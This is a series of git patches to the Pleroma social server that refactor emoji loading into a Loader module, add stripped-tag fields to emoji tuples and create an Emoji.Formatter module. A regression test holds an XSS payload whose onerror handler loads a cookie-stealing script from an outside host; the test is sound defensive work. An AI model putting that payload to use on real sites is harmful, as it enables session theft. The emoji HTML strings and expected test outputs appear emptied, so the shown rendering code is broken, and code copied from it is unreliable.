5 files changed, 304 insertions(+), 272 deletions(-)
create mode 100644 lib/pleroma/emoji/loader.ex
create mode 100644 test/emoji/loader_test.exs
diff --git a/lib/mix/tasks/pleroma/emoji.ex b/lib/mix/tasks/pleroma/emoji.ex
index c2225af7d..dc5f7c193 100644
--- a/lib/mix/tasks/pleroma/emoji.ex
+++ b/lib/mix/tasks/pleroma/emoji.ex
@@ -235,7 +235,7 @@ def run(["gen-pack", src]) do
cwd: tmp_pack_dir
)
- emoji_map = Pleroma.Emoji.make_shortcode_to_file_map(tmp_pack_dir, exts)
+ emoji_map = Pleroma.Emoji.Loader.make_shortcode_to_file_map(tmp_pack_dir, exts)
File.write!(files_name, Jason.encode!(emoji_map, pretty: true))
diff --git a/lib/pleroma/emoji.ex b/lib/pleroma/emoji.ex
index 66e20f0e4..ab6ba7d6a 100644
--- a/lib/pleroma/emoji.ex
+++ b/lib/pleroma/emoji.ex
@@ -4,24 +4,22 @@
defmodule Pleroma.Emoji do
@moduledoc """
- The emojis are loaded from:
-
- * emoji packs in INSTANCE-DIR/emoji
- * the files: `config/emoji.txt` and `config/custom_emoji.txt`
- * glob paths, nested folder is used as tag name for grouping e.g. priv/static/emoji/custom/nested_folder
-
- This GenServer stores in an ETS table the list of the loaded emojis, and also allows to reload the list at runtime.
+ This GenServer stores in an ETS table the list of the loaded emojis,
+ and also allows to reload the list at runtime.
"""
use GenServer
+ alias Pleroma.Emoji.Loader
+
require Logger
- @type pattern :: Regex.t() | module() | String.t()
- @type patterns :: pattern() | [pattern()]
- @type group_patterns :: keyword(patterns())
-
@ets __MODULE__.Ets
- @ets_options [:ordered_set, :protected, :named_table, {:read_concurrency, true}]
+ @ets_options [
+ :ordered_set,
+ :protected,
+ :named_table,
+ {:read_concurrency, true}
+ ]
@doc false
def start_link(_) do
@@ -44,7 +42,7 @@ def get(name) do
end
@doc "Returns all the emojos!!"
- @spec get_all() :: [{String.t(), String.t()}, ...]
+ @spec get_all() :: list({String.t(), String.t(), String.t()})
def get_all do
:ets.tab2list(@ets)
end
@@ -58,13 +56,13 @@ def init(_) do
@doc false
def handle_cast(:reload, state) do
- load()
+ update_emojis(Loader.load())
{:noreply, state}
end
@doc false
def handle_call(:reload, _from, state) do
- load()
+ update_emojis(Loader.load())
{:reply, :ok, state}
end
@@ -75,189 +73,11 @@ def terminate(_, _) do
@doc false
def code_change(_old_vsn, state, _extra) do
- load()
+ update_emojis(Loader.load())
{:ok, state}
end
- defp load do
- emoji_dir_path =
- Path.join(
- Pleroma.Config.get!([:instance, :static_dir]),
- "emoji"
- )
-
- emoji_groups = Pleroma.Config.get([:emoji, :groups])
-
- case File.ls(emoji_dir_path) do
- {:error, :enoent} ->
- # The custom emoji directory doesn't exist,
- # don't do anything
- nil
-
- {:error, e} ->
- # There was some other error
- Logger.error("Could not access the custom emoji directory #{emoji_dir_path}: #{e}")
-
- {:ok, results} ->
- grouped =
- Enum.group_by(results, fn file -> File.dir?(Path.join(emoji_dir_path, file)) end)
-
- packs = grouped[true] || []
- files = grouped[false] || []
-
- # Print the packs we've found
- Logger.info("Found emoji packs: #{Enum.join(packs, ", ")}")
-
- if not Enum.empty?(files) do
- Logger.warn(
- "Found files in the emoji folder. These will be ignored, please move them to a subdirectory\nFound files: #{
- Enum.join(files, ", ")
- }"
- )
- end
-
- emojis =
- Enum.flat_map(
- packs,
- fn pack -> load_pack(Path.join(emoji_dir_path, pack), emoji_groups) end
- )
-
- true = :ets.insert(@ets, emojis)
- end
-
- # Compat thing for old custom emoji handling & default emoji,
- # it should run even if there are no emoji packs
- shortcode_globs = Pleroma.Config.get([:emoji, :shortcode_globs], [])
-
- emojis =
- (load_from_file("config/emoji.txt", emoji_groups) ++
- load_from_file("config/custom_emoji.txt", emoji_groups) ++
- load_from_globs(shortcode_globs, emoji_groups))
- |> Enum.reject(fn value -> value == nil end)
-
- true = :ets.insert(@ets, emojis)
-
- :ok
- end
-
- defp load_pack(pack_dir, emoji_groups) do
- pack_name = Path.basename(pack_dir)
-
- emoji_txt = Path.join(pack_dir, "emoji.txt")
-
- if File.exists?(emoji_txt) do
- load_from_file(emoji_txt, emoji_groups)
- else
- extensions = Pleroma.Config.get([:emoji, :pack_extensions])
-
- Logger.info(
- "No emoji.txt found for pack \"#{pack_name}\", assuming all #{Enum.join(extensions, ", ")} files are emoji"
- )
-
- make_shortcode_to_file_map(pack_dir, extensions)
- |> Enum.map(fn {shortcode, rel_file} ->
- filename = Path.join("/emoji/#{pack_name}", rel_file)
-
- {shortcode, filename, [to_string(match_extra(emoji_groups, filename))]}
- end)
- end
- end
-
- def make_shortcode_to_file_map(pack_dir, exts) do
- find_all_emoji(pack_dir, exts)
- |> Enum.map(&Path.relative_to(&1, pack_dir))
- |> Enum.map(fn f -> {f |> Path.basename() |> Path.rootname(), f} end)
- |> Enum.into(%{})
- end
-
- def find_all_emoji(dir, exts) do
- Enum.reduce(
- File.ls!(dir),
- [],
- fn f, acc ->
- filepath = Path.join(dir, f)
-
- if File.dir?(filepath) do
- acc ++ find_all_emoji(filepath, exts)
- else
- acc ++ [filepath]
- end
- end
- )
- |> Enum.filter(fn f -> Path.extname(f) in exts end)
- end
-
- defp load_from_file(file, emoji_groups) do
- if File.exists?(file) do
- load_from_file_stream(File.stream!(file), emoji_groups)
- else
- []
- end
- end
-
- defp load_from_file_stream(stream, emoji_groups) do
- stream
- |> Stream.map(&String.trim/1)
- |> Stream.map(fn line ->
- case String.split(line, ~r/,\s*/) do
- [name, file] ->
- {name, file, [to_string(match_extra(emoji_groups, file))]}
-
- [name, file | tags] ->
- {name, file, tags}
-
- _ ->
- nil
- end
- end)
- |> Enum.to_list()
- end
-
- defp load_from_globs(globs, emoji_groups) do
- static_path = Path.join(:code.priv_dir(:pleroma), "static")
-
- paths =
- Enum.map(globs, fn glob ->
- Path.join(static_path, glob)
- |> Path.wildcard()
- end)
- |> Enum.concat()
-
- Enum.map(paths, fn path ->
- tag = match_extra(emoji_groups, Path.join("/", Path.relative_to(path, static_path)))
- shortcode = Path.basename(path, Path.extname(path))
- external_path = Path.join("/", Path.relative_to(path, static_path))
- {shortcode, external_path, [to_string(tag)]}
- end)
- end
-
- @doc """
- Finds a matching group for the given emoji filename
- """
- @spec match_extra(group_patterns(), String.t()) :: atom() | nil
- def match_extra(group_patterns, filename) do
- match_group_patterns(group_patterns, fn pattern ->
- case pattern do
- %Regex{} = regex -> Regex.match?(regex, filename)
- string when is_binary(string) -> filename == string
- end
- end)
- end
-
- defp match_group_patterns(group_patterns, matcher) do
- Enum.find_value(group_patterns, fn {group, patterns} ->
- patterns =
- patterns
- |> List.wrap()
- |> Enum.map(fn pattern ->
- if String.contains?(pattern, "*") do
- ~r(#{String.replace(pattern, "*", ".*")})
- else
- pattern
- end
- end)
-
- Enum.any?(patterns, matcher) && group
- end)
+ defp update_emojis(emojis) do
+ :ets.insert(@ets, emojis)
end
end
diff --git a/lib/pleroma/emoji/loader.ex b/lib/pleroma/emoji/loader.ex
new file mode 100644
index 000000000..e93b0aecc
--- /dev/null
+++ b/lib/pleroma/emoji/loader.ex
@@ -0,0 +1,204 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Emoji.Loader do
+ @moduledoc """
+ The Loader emoji from:
+
+ * emoji packs in INSTANCE-DIR/emoji
+ * the files: `config/emoji.txt` and `config/custom_emoji.txt`
+ * glob paths, nested folder is used as tag name for grouping e.g. priv/static/emoji/custom/nested_folder
+ """
+ alias Pleroma.Config
+
+ require Logger
+
+ @type pattern :: Regex.t() | module() | String.t()
+ @type patterns :: pattern() | [pattern()]
+ @type group_patterns :: keyword(patterns())
+ @type emoji :: {String.t(), String.t(), list(String.t())}
+
+ @doc """
+ Loads emojis from files/packs.
+
+ returns list emojis in format:
+ `{"000", "/emoji/freespeechextremist.com/000.png", ["Custom"]}`
+ """
+ @spec load() :: list(emoji)
+ def load do
+ emoji_dir_path = Path.join(Config.get!([:instance, :static_dir]), "emoji")
+
+ emoji_groups = Config.get([:emoji, :groups])
+
+ emojis =
+ case File.ls(emoji_dir_path) do
+ {:error, :enoent} ->
+ # The custom emoji directory doesn't exist,
+ # don't do anything
+ []
+
+ {:error, e} ->
+ # There was some other error
+ Logger.error("Could not access the custom emoji directory #{emoji_dir_path}: #{e}")
+ []
+
+ {:ok, results} ->
+ grouped =
+ Enum.group_by(results, fn file ->
+ File.dir?(Path.join(emoji_dir_path, file))
+ end)
+
+ packs = grouped[true] || []
+ files = grouped[false] || []
+
+ # Print the packs we've found
+ Logger.info("Found emoji packs: #{Enum.join(packs, ", ")}")
+
+ if not Enum.empty?(files) do
+ Logger.warn(
+ "Found files in the emoji folder. These will be ignored, please move them to a subdirectory\nFound files: #{
+ Enum.join(files, ", ")
+ }"
+ )
+ end
+
+ Enum.flat_map(packs, fn pack ->
+ load_pack(Path.join(emoji_dir_path, pack), emoji_groups)
+ end)
+ end
+
+ # Compat thing for old custom emoji handling & default emoji,
+ # it should run even if there are no emoji packs
+ shortcode_globs = Config.get([:emoji, :shortcode_globs], [])
+
+ emojis_txt =
+ (load_from_file("config/emoji.txt", emoji_groups) ++
+ load_from_file("config/custom_emoji.txt", emoji_groups) ++
+ load_from_globs(shortcode_globs, emoji_groups))
+ |> Enum.reject(fn value -> value == nil end)
+
+ emojis ++ emojis_txt
+ end
+
+ defp load_pack(pack_dir, emoji_groups) do
+ pack_name = Path.basename(pack_dir)
+
+ emoji_txt = Path.join(pack_dir, "emoji.txt")
+
+ if File.exists?(emoji_txt) do
+ load_from_file(emoji_txt, emoji_groups)
+ else
+ extensions = Config.get([:emoji, :pack_extensions])
+
+ Logger.info(
+ "No emoji.txt found for pack \"#{pack_name}\", assuming all #{Enum.join(extensions, ", ")} files are emoji"
+ )
+
+ make_shortcode_to_file_map(pack_dir, extensions)
+ |> Enum.map(fn {shortcode, rel_file} ->
+ filename = Path.join("/emoji/#{pack_name}", rel_file)
+
+ {shortcode, filename, [to_string(match_extra(emoji_groups, filename))]}
+ end)
+ end
+ end
+
+ def make_shortcode_to_file_map(pack_dir, exts) do
+ find_all_emoji(pack_dir, exts)
+ |> Enum.map(&Path.relative_to(&1, pack_dir))
+ |> Enum.map(fn f -> {f |> Path.basename() |> Path.rootname(), f} end)
+ |> Enum.into(%{})
+ end
+
+ def find_all_emoji(dir, exts) do
+ Enum.reduce(
+ File.ls!(dir),
+ [],
+ fn f, acc ->
+ filepath = Path.join(dir, f)
+
+ if File.dir?(filepath) do
+ acc ++ find_all_emoji(filepath, exts)
+ else
+ acc ++ [filepath]
+ end
+ end
+ )
+ |> Enum.filter(fn f -> Path.extname(f) in exts end)
+ end
+
+ defp load_from_file(file, emoji_groups) do
+ if File.exists?(file) do
+ load_from_file_stream(File.stream!(file), emoji_groups)
+ else
+ []
+ end
+ end
+
+ defp load_from_file_stream(stream, emoji_groups) do
+ stream
+ |> Stream.map(&String.trim/1)
+ |> Stream.map(fn line ->
+ case String.split(line, ~r/,\s*/) do
+ [name, file] ->
+ {name, file, [to_string(match_extra(emoji_groups, file))]}
+
+ [name, file | tags] ->
+ {name, file, tags}
+
+ _ ->
+ nil
+ end
+ end)
+ |> Enum.to_list()
+ end
+
+ defp load_from_globs(globs, emoji_groups) do
+ static_path = Path.join(:code.priv_dir(:pleroma), "static")
+
+ paths =
+ Enum.map(globs, fn glob ->
+ Path.join(static_path, glob)
+ |> Path.wildcard()
+ end)
+ |> Enum.concat()
+
+ Enum.map(paths, fn path ->
+ tag = match_extra(emoji_groups, Path.join("/", Path.relative_to(path, static_path)))
+ shortcode = Path.basename(path, Path.extname(path))
+ external_path = Path.join("/", Path.relative_to(path, static_path))
+ {shortcode, external_path, [to_string(tag)]}
+ end)
+ end
+
+ @doc """
+ Finds a matching group for the given emoji filename
+ """
+ @spec match_extra(group_patterns(), String.t()) :: atom() | nil
+ def match_extra(group_patterns, filename) do
+ match_group_patterns(group_patterns, fn pattern ->
+ case pattern do
+ %Regex{} = regex -> Regex.match?(regex, filename)
+ string when is_binary(string) -> filename == string
+ end
+ end)
+ end
+
+ defp match_group_patterns(group_patterns, matcher) do
+ Enum.find_value(group_patterns, fn {group, patterns} ->
+ patterns =
+ patterns
+ |> List.wrap()
+ |> Enum.map(fn pattern ->
+ if String.contains?(pattern, "*") do
+ ~r(#{String.replace(pattern, "*", ".*")})
+ else
+ pattern
+ end
+ end)
+
+ Enum.any?(patterns, matcher) && group
+ end)
+ end
+end
diff --git a/test/emoji/loader_test.exs b/test/emoji/loader_test.exs
new file mode 100644
index 000000000..045eef150
--- /dev/null
+++ b/test/emoji/loader_test.exs
@@ -0,0 +1,83 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Emoji.LoaderTest do
+ use ExUnit.Case, async: true
+ alias Pleroma.Emoji.Loader
+
+ describe "match_extra/2" do
+ setup do
+ groups = [
+ "list of files": ["/emoji/custom/first_file.png", "/emoji/custom/second_file.png"],
+ "wildcard folder": "/emoji/custom/*/file.png",
+ "wildcard files": "/emoji/custom/folder/*.png",
+ "special file": "/emoji/custom/special.png"
+ ]
+
+ {:ok, groups: groups}
+ end
+
+ test "config for list of files", %{groups: groups} do
+ group =
+ groups
+ |> Loader.match_extra("/emoji/custom/first_file.png")
+ |> to_string()
+
+ assert group == "list of files"
+ end
+
+ test "config with wildcard folder", %{groups: groups} do
+ group =
+ groups
+ |> Loader.match_extra("/emoji/custom/some_folder/file.png")
+ |> to_string()
+
+ assert group == "wildcard folder"
+ end
+
+ test "config with wildcard folder and subfolders", %{groups: groups} do
+ group =
+ groups
+ |> Loader.match_extra("/emoji/custom/some_folder/another_folder/file.png")
+ |> to_string()
+
+ assert group == "wildcard folder"
+ end
+
+ test "config with wildcard files", %{groups: groups} do
+ group =
+ groups
+ |> Loader.match_extra("/emoji/custom/folder/some_file.png")
+ |> to_string()
+
+ assert group == "wildcard files"
+ end
+
+ test "config with wildcard files and subfolders", %{groups: groups} do
+ group =
+ groups
+ |> Loader.match_extra("/emoji/custom/folder/another_folder/some_file.png")
+ |> to_string()
+
+ assert group == "wildcard files"
+ end
+
+ test "config for special file", %{groups: groups} do
+ group =
+ groups
+ |> Loader.match_extra("/emoji/custom/special.png")
+ |> to_string()
+
+ assert group == "special file"
+ end
+
+ test "no mathing returns nil", %{groups: groups} do
+ group =
+ groups
+ |> Loader.match_extra("/emoji/some_undefined.png")
+
+ refute group
+ end
+ end
+end
diff --git a/test/emoji_test.exs b/test/emoji_test.exs
index 07ac6ff1d..32a828cc9 100644
--- a/test/emoji_test.exs
+++ b/test/emoji_test.exs
@@ -32,79 +32,4 @@ test "random emoji", %{emoji_list: emoji_list} do
assert is_list(tags)
end
end
-
- describe "match_extra/2" do
- setup do
- groups = [
- "list of files": ["/emoji/custom/first_file.png", "/emoji/custom/second_file.png"],
- "wildcard folder": "/emoji/custom/*/file.png",
- "wildcard files": "/emoji/custom/folder/*.png",
- "special file": "/emoji/custom/special.png"
- ]
-
- {:ok, groups: groups}
- end
-
- test "config for list of files", %{groups: groups} do
- group =
- groups
- |> Emoji.match_extra("/emoji/custom/first_file.png")
- |> to_string()
-
- assert group == "list of files"
- end
-
- test "config with wildcard folder", %{groups: groups} do
- group =
- groups
- |> Emoji.match_extra("/emoji/custom/some_folder/file.png")
- |> to_string()
-
- assert group == "wildcard folder"
- end
-
- test "config with wildcard folder and subfolders", %{groups: groups} do
- group =
- groups
- |> Emoji.match_extra("/emoji/custom/some_folder/another_folder/file.png")
- |> to_string()
-
- assert group == "wildcard folder"
- end
-
- test "config with wildcard files", %{groups: groups} do
- group =
- groups
- |> Emoji.match_extra("/emoji/custom/folder/some_file.png")
- |> to_string()
-
- assert group == "wildcard files"
- end
-
- test "config with wildcard files and subfolders", %{groups: groups} do
- group =
- groups
- |> Emoji.match_extra("/emoji/custom/folder/another_folder/some_file.png")
- |> to_string()
-
- assert group == "wildcard files"
- end
-
- test "config for special file", %{groups: groups} do
- group =
- groups
- |> Emoji.match_extra("/emoji/custom/special.png")
- |> to_string()
-
- assert group == "special file"
- end
-
- test "no mathing returns nil", %{groups: groups} do
- group =
- groups
- |> Emoji.match_extra("/emoji/some_undefined.png")
-
- refute group
- end
- end
end
From d7808b5db437b3300122127cef4c7ad076de7bda Mon Sep 17 00:00:00 2001
From: Maksim Pechnikov
Date: Thu, 29 Aug 2019 06:22:18 +0300
Subject: [PATCH 014/272] added code\path fields without html tags in ets
---
lib/pleroma/emoji/loader.ex | 12 +-
lib/pleroma/formatter.ex | 31 ++---
lib/pleroma/web/common_api/utils.ex | 2 +-
.../controllers/mastodon_api_controller.ex | 2 +-
.../controllers/util_controller.ex | 2 +-
test/emoji_test.exs | 8 +-
test/formatter_test.exs | 110 +++++++++---------
7 files changed, 93 insertions(+), 74 deletions(-)
diff --git a/lib/pleroma/emoji/loader.ex b/lib/pleroma/emoji/loader.ex
index e93b0aecc..70eba9ac6 100644
--- a/lib/pleroma/emoji/loader.ex
+++ b/lib/pleroma/emoji/loader.ex
@@ -78,7 +78,17 @@ def load do
load_from_globs(shortcode_globs, emoji_groups))
|> Enum.reject(fn value -> value == nil end)
- emojis ++ emojis_txt
+ Enum.map(emojis ++ emojis_txt, &prepare_emoji/1)
+ end
+
+ defp prepare_emoji({code, file, tags} = _emoji) do
+ {
+ code,
+ file,
+ tags,
+ Pleroma.HTML.strip_tags(code),
+ Pleroma.HTML.strip_tags(file)
+ }
end
defp load_pack(pack_dir, emoji_groups) do
diff --git a/lib/pleroma/formatter.ex b/lib/pleroma/formatter.ex
index 607843a5b..84955289c 100644
--- a/lib/pleroma/formatter.ex
+++ b/lib/pleroma/formatter.ex
@@ -107,19 +107,22 @@ def emojify(text) do
def emojify(text, nil), do: text
def emojify(text, emoji, strip \\ false) do
- Enum.reduce(emoji, text, fn emoji_data, text ->
- emoji = HTML.strip_tags(elem(emoji_data, 0))
- file = HTML.strip_tags(elem(emoji_data, 1))
+ Enum.reduce(emoji, text, fn
+ {_, _, _, emoji, file}, text ->
+ String.replace(text, ":#{emoji}:", prepare_emoji_html(emoji, file, strip))
- html =
- if not strip do
- ""
- else
- ""
- end
-
- String.replace(text, ":#{emoji}:", html) |> HTML.filter_tags()
+ emoji_data, text ->
+ emoji = HTML.strip_tags(elem(emoji_data, 0))
+ file = HTML.strip_tags(elem(emoji_data, 1))
+ String.replace(text, ":#{emoji}:", prepare_emoji_html(emoji, file, strip))
end)
+ |> HTML.filter_tags()
+ end
+
+ defp prepare_emoji_html(_emoji, _file, true), do: ""
+
+ defp prepare_emoji_html(emoji, file, _strip) do
+ ""
end
def demojify(text) do
@@ -130,7 +133,9 @@ def demojify(text, nil), do: text
@doc "Outputs a list of the emoji-shortcodes in a text"
def get_emoji(text) when is_binary(text) do
- Enum.filter(Emoji.get_all(), fn {emoji, _, _} -> String.contains?(text, ":#{emoji}:") end)
+ Enum.filter(Emoji.get_all(), fn {emoji, _, _, _, _} ->
+ String.contains?(text, ":#{emoji}:")
+ end)
end
def get_emoji(_), do: []
@@ -138,7 +143,7 @@ def get_emoji(_), do: []
@doc "Outputs a list of the emoji-Maps in a text"
def get_emoji_map(text) when is_binary(text) do
get_emoji(text)
- |> Enum.reduce(%{}, fn {name, file, _group}, acc ->
+ |> Enum.reduce(%{}, fn {name, file, _group, _, _}, acc ->
Map.put(acc, name, "#{Pleroma.Web.Endpoint.static_url()}#{file}")
end)
end
diff --git a/lib/pleroma/web/common_api/utils.ex b/lib/pleroma/web/common_api/utils.ex
index 6958c7511..9686e6491 100644
--- a/lib/pleroma/web/common_api/utils.ex
+++ b/lib/pleroma/web/common_api/utils.ex
@@ -435,7 +435,7 @@ def confirm_current_password(user, password) do
def emoji_from_profile(%{info: _info} = user) do
(Formatter.get_emoji(user.bio) ++ Formatter.get_emoji(user.name))
- |> Enum.map(fn {shortcode, url, _} ->
+ |> Enum.map(fn {shortcode, url, _, _, _} ->
%{
"type" => "Emoji",
"icon" => %{"type" => "Image", "url" => "#{Endpoint.url()}#{url}"},
diff --git a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
index 83e877c0e..603c6b3c6 100644
--- a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
+++ b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
@@ -331,7 +331,7 @@ def peers(conn, _params) do
defp mastodonized_emoji do
Pleroma.Emoji.get_all()
- |> Enum.map(fn {shortcode, relative_url, tags} ->
+ |> Enum.map(fn {shortcode, relative_url, tags, _, _} ->
url = to_string(URI.merge(Web.base_url(), relative_url))
%{
diff --git a/lib/pleroma/web/twitter_api/controllers/util_controller.ex b/lib/pleroma/web/twitter_api/controllers/util_controller.ex
index 3405bd3b7..923480242 100644
--- a/lib/pleroma/web/twitter_api/controllers/util_controller.ex
+++ b/lib/pleroma/web/twitter_api/controllers/util_controller.ex
@@ -240,7 +240,7 @@ def version(conn, _params) do
def emoji(conn, _params) do
emoji =
Emoji.get_all()
- |> Enum.map(fn {short_code, path, tags} ->
+ |> Enum.map(fn {short_code, path, tags, _, _} ->
{short_code, %{image_url: path, tags: tags}}
end)
|> Enum.into(%{})
diff --git a/test/emoji_test.exs b/test/emoji_test.exs
index 32a828cc9..82f9c52ff 100644
--- a/test/emoji_test.exs
+++ b/test/emoji_test.exs
@@ -14,9 +14,9 @@ defmodule Pleroma.EmojiTest do
test "first emoji", %{emoji_list: emoji_list} do
[emoji | _others] = emoji_list
- {code, path, tags} = emoji
+ {code, path, tags, _, _} = emoji
- assert tuple_size(emoji) == 3
+ assert tuple_size(emoji) == 5
assert is_binary(code)
assert is_binary(path)
assert is_list(tags)
@@ -24,9 +24,9 @@ test "first emoji", %{emoji_list: emoji_list} do
test "random emoji", %{emoji_list: emoji_list} do
emoji = Enum.random(emoji_list)
- {code, path, tags} = emoji
+ {code, path, tags, _, _} = emoji
- assert tuple_size(emoji) == 3
+ assert tuple_size(emoji) == 5
assert is_binary(code)
assert is_binary(path)
assert is_list(tags)
diff --git a/test/formatter_test.exs b/test/formatter_test.exs
index bfa673049..7a5bd0f9f 100644
--- a/test/formatter_test.exs
+++ b/test/formatter_test.exs
@@ -217,6 +217,27 @@ test "given the 'safe_mention' option, it will keep text after newlines" do
assert expected_text =~ "how are you doing?"
end
+
+ test "it can parse mentions and return the relevant users" do
+ text =
+ "@@gsimg According to @archaeme, that is @daggsy. Also hello @archaeme@archae.me and @o and @@@jimm"
+
+ o = insert(:user, %{nickname: "o"})
+ jimm = insert(:user, %{nickname: "jimm"})
+ gsimg = insert(:user, %{nickname: "gsimg"})
+ archaeme = insert(:user, %{nickname: "archaeme"})
+ archaeme_remote = insert(:user, %{nickname: "archaeme@archae.me"})
+
+ expected_mentions = [
+ {"@archaeme", archaeme},
+ {"@archaeme@archae.me", archaeme_remote},
+ {"@gsimg", gsimg},
+ {"@jimm", jimm},
+ {"@o", o}
+ ]
+
+ assert {_text, ^expected_mentions, []} = Formatter.linkify(text)
+ end
end
describe ".parse_tags" do
@@ -234,67 +255,50 @@ test "parses tags in the text" do
end
end
- test "it can parse mentions and return the relevant users" do
- text =
- "@@gsimg According to @archaeme, that is @daggsy. Also hello @archaeme@archae.me and @o and @@@jimm"
+ describe "emojify" do
+ test "it adds cool emoji" do
+ text = "I love :firefox:"
- o = insert(:user, %{nickname: "o"})
- jimm = insert(:user, %{nickname: "jimm"})
- gsimg = insert(:user, %{nickname: "gsimg"})
- archaeme = insert(:user, %{nickname: "archaeme"})
- archaeme_remote = insert(:user, %{nickname: "archaeme@archae.me"})
+ expected_result =
+ "I love "
- expected_mentions = [
- {"@archaeme", archaeme},
- {"@archaeme@archae.me", archaeme_remote},
- {"@gsimg", gsimg},
- {"@jimm", jimm},
- {"@o", o}
- ]
+ assert Formatter.emojify(text) == expected_result
+ end
- assert {_text, ^expected_mentions, []} = Formatter.linkify(text)
+ test "it does not add XSS emoji" do
+ text =
+ "I love :'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a):"
+
+ custom_emoji = %{
+ "'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a)" =>
+ "https://placehold.it/1x1"
+ }
+
+ expected_result =
+ "I love "
+
+ assert Formatter.emojify(text, custom_emoji) == expected_result
+ end
end
- test "it adds cool emoji" do
- text = "I love :firefox:"
+ describe "get_emoji" do
+ test "it returns the emoji used in the text" do
+ text = "I love :firefox:"
- expected_result =
- "I love "
+ assert Formatter.get_emoji(text) == [
+ {"firefox", "/emoji/Firefox.gif", ["Gif", "Fun"], "firefox", "/emoji/Firefox.gif"}
+ ]
+ end
- assert Formatter.emojify(text) == expected_result
- end
+ test "it returns a nice empty result when no emojis are present" do
+ text = "I love moominamma"
+ assert Formatter.get_emoji(text) == []
+ end
- test "it does not add XSS emoji" do
- text =
- "I love :'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a):"
-
- custom_emoji = %{
- "'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a)" =>
- "https://placehold.it/1x1"
- }
-
- expected_result =
- "I love "
-
- assert Formatter.emojify(text, custom_emoji) == expected_result
- end
-
- test "it returns the emoji used in the text" do
- text = "I love :firefox:"
-
- assert Formatter.get_emoji(text) == [
- {"firefox", "/emoji/Firefox.gif", ["Gif", "Fun"]}
- ]
- end
-
- test "it returns a nice empty result when no emojis are present" do
- text = "I love moominamma"
- assert Formatter.get_emoji(text) == []
- end
-
- test "it doesn't die when text is absent" do
- text = nil
- assert Formatter.get_emoji(text) == []
+ test "it doesn't die when text is absent" do
+ text = nil
+ assert Formatter.get_emoji(text) == []
+ end
end
test "it escapes HTML in plain text" do
From 5c90b7073332ac333a5db9dfc82744cee03843fa Mon Sep 17 00:00:00 2001
From: Maksim
Date: Thu, 29 Aug 2019 11:45:25 +0000
Subject: [PATCH 015/272] Apply suggestion to lib/pleroma/emoji/loader.ex
---
lib/pleroma/emoji/loader.ex | 20 +++++++++-----------
1 file changed, 9 insertions(+), 11 deletions(-)
diff --git a/lib/pleroma/emoji/loader.ex b/lib/pleroma/emoji/loader.ex
index 70eba9ac6..82fc3b8c3 100644
--- a/lib/pleroma/emoji/loader.ex
+++ b/lib/pleroma/emoji/loader.ex
@@ -122,19 +122,17 @@ def make_shortcode_to_file_map(pack_dir, exts) do
end
def find_all_emoji(dir, exts) do
- Enum.reduce(
- File.ls!(dir),
- [],
- fn f, acc ->
- filepath = Path.join(dir, f)
+ dir
+ |> File.ls!()
+ |> Enum.flat_map(fn f ->
+ filepath = Path.join(dir, f)
- if File.dir?(filepath) do
- acc ++ find_all_emoji(filepath, exts)
- else
- acc ++ [filepath]
- end
+ if File.dir?(filepath) do
+ find_all_emoji(filepath, exts)
+ else
+ [filepath]
end
- )
+ end)
|> Enum.filter(fn f -> Path.extname(f) in exts end)
end
From d8098d142a0e8412eabdf5fe63705c25bcb1be34 Mon Sep 17 00:00:00 2001
From: Maksim Pechnikov
Date: Thu, 29 Aug 2019 22:01:37 +0300
Subject: [PATCH 016/272] added Emoji.Formatter
---
lib/pleroma/emoji/formatter.ex | 59 +++++++++++++++++++
lib/pleroma/formatter.ex | 52 ----------------
lib/pleroma/web/common_api/common_api.ex | 18 +++---
lib/pleroma/web/common_api/utils.ex | 5 +-
.../controllers/mastodon_api_controller.ex | 4 +-
lib/pleroma/web/metadata/utils.ex | 5 +-
.../web/twitter_api/twitter_api_controller.ex | 4 +-
.../web/twitter_api/views/activity_view.ex | 6 +-
.../web/twitter_api/views/user_view.ex | 7 ++-
test/emoji/formatter_test.exs | 54 +++++++++++++++++
test/formatter_test.exs | 46 ---------------
11 files changed, 141 insertions(+), 119 deletions(-)
create mode 100644 lib/pleroma/emoji/formatter.ex
create mode 100644 test/emoji/formatter_test.exs
diff --git a/lib/pleroma/emoji/formatter.ex b/lib/pleroma/emoji/formatter.ex
new file mode 100644
index 000000000..acdef3988
--- /dev/null
+++ b/lib/pleroma/emoji/formatter.ex
@@ -0,0 +1,59 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Emoji.Formatter do
+ alias Pleroma.Emoji
+ alias Pleroma.HTML
+ alias Pleroma.Web.MediaProxy
+
+ def emojify(text) do
+ emojify(text, Emoji.get_all())
+ end
+
+ def emojify(text, nil), do: text
+
+ def emojify(text, emoji, strip \\ false) do
+ Enum.reduce(emoji, text, fn
+ {_, _, _, emoji, file}, text ->
+ String.replace(text, ":#{emoji}:", prepare_emoji_html(emoji, file, strip))
+
+ emoji_data, text ->
+ emoji = HTML.strip_tags(elem(emoji_data, 0))
+ file = HTML.strip_tags(elem(emoji_data, 1))
+ String.replace(text, ":#{emoji}:", prepare_emoji_html(emoji, file, strip))
+ end)
+ |> HTML.filter_tags()
+ end
+
+ defp prepare_emoji_html(_emoji, _file, true), do: ""
+
+ defp prepare_emoji_html(emoji, file, _strip) do
+ ""
+ end
+
+ def demojify(text) do
+ emojify(text, Emoji.get_all(), true)
+ end
+
+ def demojify(text, nil), do: text
+
+ @doc "Outputs a list of the emoji-shortcodes in a text"
+ def get_emoji(text) when is_binary(text) do
